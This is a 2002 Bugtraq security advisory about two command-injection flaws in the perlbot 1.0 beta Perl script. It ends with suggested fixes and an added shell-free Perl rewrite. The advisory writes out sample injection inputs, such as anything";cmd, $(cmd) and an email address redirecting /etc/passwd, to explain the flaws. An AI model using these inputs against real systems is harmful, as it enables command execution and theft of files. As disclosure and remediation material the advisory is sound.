81655 2002-10-19 01:04 /111 lines/ guejez <guejez@scan-associates.net>
Imported: 2002-10-19 01:04 by Brevbäraren
External recipient: vulnwatch@vulnwatch.org
Recipient: Bugtraq (import) <2017>
Subject: SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution
------------------------------------------------------------

perlbot 1.0 beta - Remote Command Execution
Discovered by guejez of scan-associates.net

About perlbot:
------------------
[quote from perlbot website]
""
[/quote from perlbot website]

perlbot is available at http://stigmata.gothcafe.com/~madhater

Vulnerable (tested) Versions:
--------------------
Perlbot version 1.0 beta on SuSE 7.3

Vendor Contact:
----------------
07-22-02 - Emailed myneid ^^at^^ gothcafe.com and alerted him of this vulnerability.
07-22-02 - Received email confirming the vulnerabilities and stating that fixes could be in a new version.

Vulnerabilities:
----------------

-- Command Execution

1. Because there is no input filtering and the script calls the shell, the script can be used to execute any command it has permission to run.

A more detailed explanation:

The script does not limit the characters that user input can send to the shell. The problem is in this line:

    foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)

This allows an attacker to "break out" of the quotes and issue any command they wish with input such as anything";cmd. Other abuses include issuing commands with `cmd` and $(cmd), or with \xxx where xxx is the octal value of any character. Some form of user input filtering must be used.

2. Because there is no input filtering and the script uses a bad open() call when it attempts to send email, it is possible to execute commands.

A more detailed explanation:

The script attempts to send an email to the user. It takes the user's email address and passes it to the shell as an argument to the mail program:

    open (MAIL,"| $sendmail $recipient") || die $!;

This means an email address such as hacker@scan-associates.net < /etc/passwd could be used to obtain any file on the system that the script has permission to read, and command execution is possible with hacker@scan-associates.net ; cmd. To prevent this, simply take the $recipient value out of the shell call.

Proof Of Concept:
-----------------
No proof of concept will be given for these issues.

Fix:
----
According to the author, a fix could be in a new version of the script. The script's homepage was down at the time of this advisory, so here is the suggested fix.

Replace the following line:

    my $word=$';

With:

    my $word=$';
    $word =~ s/[^\w]//g;

And replace the following line:

    open (MAIL,"| $sendmail $recipient") || die $!;

With:

    open (MAIL,"| $sendmail -t") || die $!;

Thanks:
-------
irc.efnet.org #vuln - various people helping with perl security issues.
pokleyzz, sk, and all of scan-associates.net

--------------------------------------------------------------------------
http://www.scan-associates.net/
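The two calls rewritten so that no user input ever reaches /bin/sh, as an added example (the editor's, not code from the perlbot author): instead of stripping characters it rejects anything that is not a plain word or a plain address, feeds ispell through IPC::Open2 and the mailer through a list-form pipe open, so argv is passed straight to execve and is never re-parsed by a shell. The ispell path, the -a flag and sendmail -t come from the advisory; the whitelist patterns, function names and the $sendmail argument are assumptions.

```perl
#!/usr/bin/perl
# Added example, not the perlbot author's code: the advisory's two shell
# calls rewritten so that user input is validated and never touches a shell.
use strict;
use warnings;
use IPC::Open2;

# Whitelist (assumed pattern) a word before it goes near a command.
# Returns undef for anything that is not a plain word.
sub clean_word {
    my ($word) = @_;
    return undef unless defined $word && $word =~ /\A[\w'-]{1,64}\z/;
    return $word;
}

# Spell-check one word. open2 takes a list, so quotes, ';', backticks and
# $() in $word are ordinary characters: there is no shell to interpret them.
sub ispell_lines {
    my ($word) = @_;
    my $clean = clean_word($word);
    return () unless defined $clean;
    my $pid = open2(my $out, my $in, '/usr/local/bin/ispell', '-a');
    print {$in} "$clean\n";
    close $in;                 # EOF so ispell finishes and exits
    my @lines = <$out>;
    waitpid $pid, 0;
    return @lines;
}

# Validate an address (assumed pattern) before it is written into a header.
# \z rather than $ rejects a trailing newline, so the To: line cannot be
# extended with extra header lines.
sub clean_recipient {
    my ($addr) = @_;
    return undef unless defined $addr
        && $addr =~ /\A[\w.+-]+@[\w-]+(?:\.[\w-]+)+\z/;
    return $addr;
}

# The advisory's fix: `sendmail -t` reads the recipient from the To: header
# on stdin, so $recipient is never a command-line argument at all.
sub send_mail {
    my ($sendmail, $recipient, $body) = @_;
    my $to = clean_recipient($recipient);
    return 0 unless defined $to;
    open(my $mail, '|-', $sendmail, '-t') or die "open $sendmail: $!";
    print {$mail} "To: $to\nSubject: perlbot\n\n$body\n";
    return close $mail;        # true only if sendmail exited cleanly
}
```

Both helpers return an empty list or false for rejected input, so the caller can report a bad word or address instead of passing it on.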